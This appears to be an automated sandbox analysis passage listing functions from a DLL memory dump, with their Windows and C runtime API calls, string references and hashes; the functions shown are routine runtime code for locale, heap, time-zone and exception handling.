Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4BE835,?,?,?,?,6D4BE211,?,00000004), ref: 6D4CD5ED
_wcschr.LIBVCRUNTIME ref: 6D4CD67D
_wcschr.LIBVCRUNTIME ref: 6D4CD68B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,5Km,00000000,?), ref: 6D4CD72E

Strings

5Km, xrefs: 6D4CD604, 6D4CD64C, 6D4CD6F4

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: 5Km
API String ID: 4212172061-3890798359
Opcode ID: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction ID: c7b4aa6cc9255ef32e1e0c6e84fd27d3a38a885c2bb9104d8a2fbe77972dba8b
Opcode Fuzzy Hash: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction Fuzzy Hash: F5613B79644206AAEB14EF35CC40FBA73ACEF85754F21442DEA19D7280EB70ED41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CDC8D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD26
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD4F
GetACP.KERNEL32(?,?,6D4CDFAC,?,00000000), ref: 6D4CDD64

Strings

OCP, xrefs: 6D4CDCE1
ACP, xrefs: 6D4CDCAB

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction ID: afcc78d726148c01da03b54a7522da485126a0f8b0fb36e3f9a78dbf1537bf20
Opcode Fuzzy Hash: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction Fuzzy Hash: 3321B22AAC4142AAD7258F18C940F9773B6FFC5B20B628465E909D7304F732DD42C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B3EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D4B3FD2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D4B3FDC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D4B3FE9

Strings

^Km, xrefs: 6D4B3EDC

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ^Km
API String ID: 3906539128-1844677095
Opcode ID: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction ID: cd2e0200362100516e66bf70fd4938679b4b61cbe588f2580bda20d9f7015413
Opcode Fuzzy Hash: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction Fuzzy Hash: 3331D47590121DABCB21DF29D888B9DBBB8BF08354F5141DAE41DAB250EB709F818F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF177, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

_memcmp.LIBVCRUNTIME ref: 6D4BF421
_free.LIBCMT ref: 6D4BF492
_free.LIBCMT ref: 6D4BF4AB
_free.LIBCMT ref: 6D4BF4DD
_free.LIBCMT ref: 6D4BF4E6
_free.LIBCMT ref: 6D4BF4F2

Strings

C, xrefs: 6D4BF2DF

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction ID: e5cc26451342284ca9e30399d7b24bc33520185a7663a7318929f6840039b9d8
Opcode Fuzzy Hash: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction Fuzzy Hash: BBC12B7990621A9FDB24CF18C884FADB7B4FB59304F6185AAD90DA7350D731AE90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BECF9, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

_free.LIBCMT ref: 6D4BEE04
_free.LIBCMT ref: 6D4BEE1B
_free.LIBCMT ref: 6D4BEE3A
_free.LIBCMT ref: 6D4BEE55
_free.LIBCMT ref: 6D4BEE6C

Strings

DnPm, xrefs: 6D4BEDDE

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: DnPm
API String ID: 3033488037-4274239213
Opcode ID: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction ID: 840883cf38a15c5203f375ba5df4977e8554e6b8ab4b1da75fd05d0cba5d0c8f
Opcode Fuzzy Hash: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction Fuzzy Hash: 1551B175A04305AFEB11CF69C880F6A77F4EF99724F2145ADEA09DB250E731DE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B526F, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D4B529B
__cftoe.LIBCMT ref: 6D4B52CD

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: a4abe29959c0a52243ed8dae2995c1bf07663e8bd6fca02d284aa7444e14bc67
Instruction ID: 77aa08f2837dde20e0125cb36e60d72b669232d6ba81a54a10bc59d693d25092
Opcode Fuzzy Hash: a4abe29959c0a52243ed8dae2995c1bf07663e8bd6fca02d284aa7444e14bc67
Instruction Fuzzy Hash: F951F436908206ABDB148B69DC40FBEB7B8AF59364F61421DE924A6391DB71CD00CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 39f68d42296a3712416a2a84d797ec03e357c5bf69043e76d1e85c4016da6016
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: 39f68d42296a3712416a2a84d797ec03e357c5bf69043e76d1e85c4016da6016
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D479011, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47901D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47902B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,?,6D4915E0,6D55AA10,6D55AA10,6D55AA10,?,?,?,?,?,6D4915E0,6D528C7C,6D531C84), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction ID: e853d611abc77f117fb1495fa93b2d0f8dfa1243752263ca532ed9fdda3aa22b
Opcode Fuzzy Hash: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction Fuzzy Hash: ADF01275C0424C77CF18EAF6D895CDDBB7CAA04104F814465AB10A6451EF71AB1DD7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C6222, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction ID: 59c9bfc6b0aa7a6701e9cf71c177da828ed1b7120ff8ddd4112a157fef5c3bf3
Opcode Fuzzy Hash: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction Fuzzy Hash: 9871BF399042179BDB21CF59C844FBFBB75EF45314F258229E96467260DB708C42CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87
std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481129
std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8
_Mpunct.LIBCPMT ref: 6D4811EB

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction ID: 6420f1ee8e18ce224156004517cb5ab3ff3272c5042cc890e9c317a93406412b
Opcode Fuzzy Hash: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction Fuzzy Hash: B521BA758042199BCF15CFA4C840EEE7BB5AF89354F26040EEA24AB390DB70DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D
codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B
codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D
ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowctype
String ID:
API String ID: 1081823724-0
Opcode ID: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95
moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
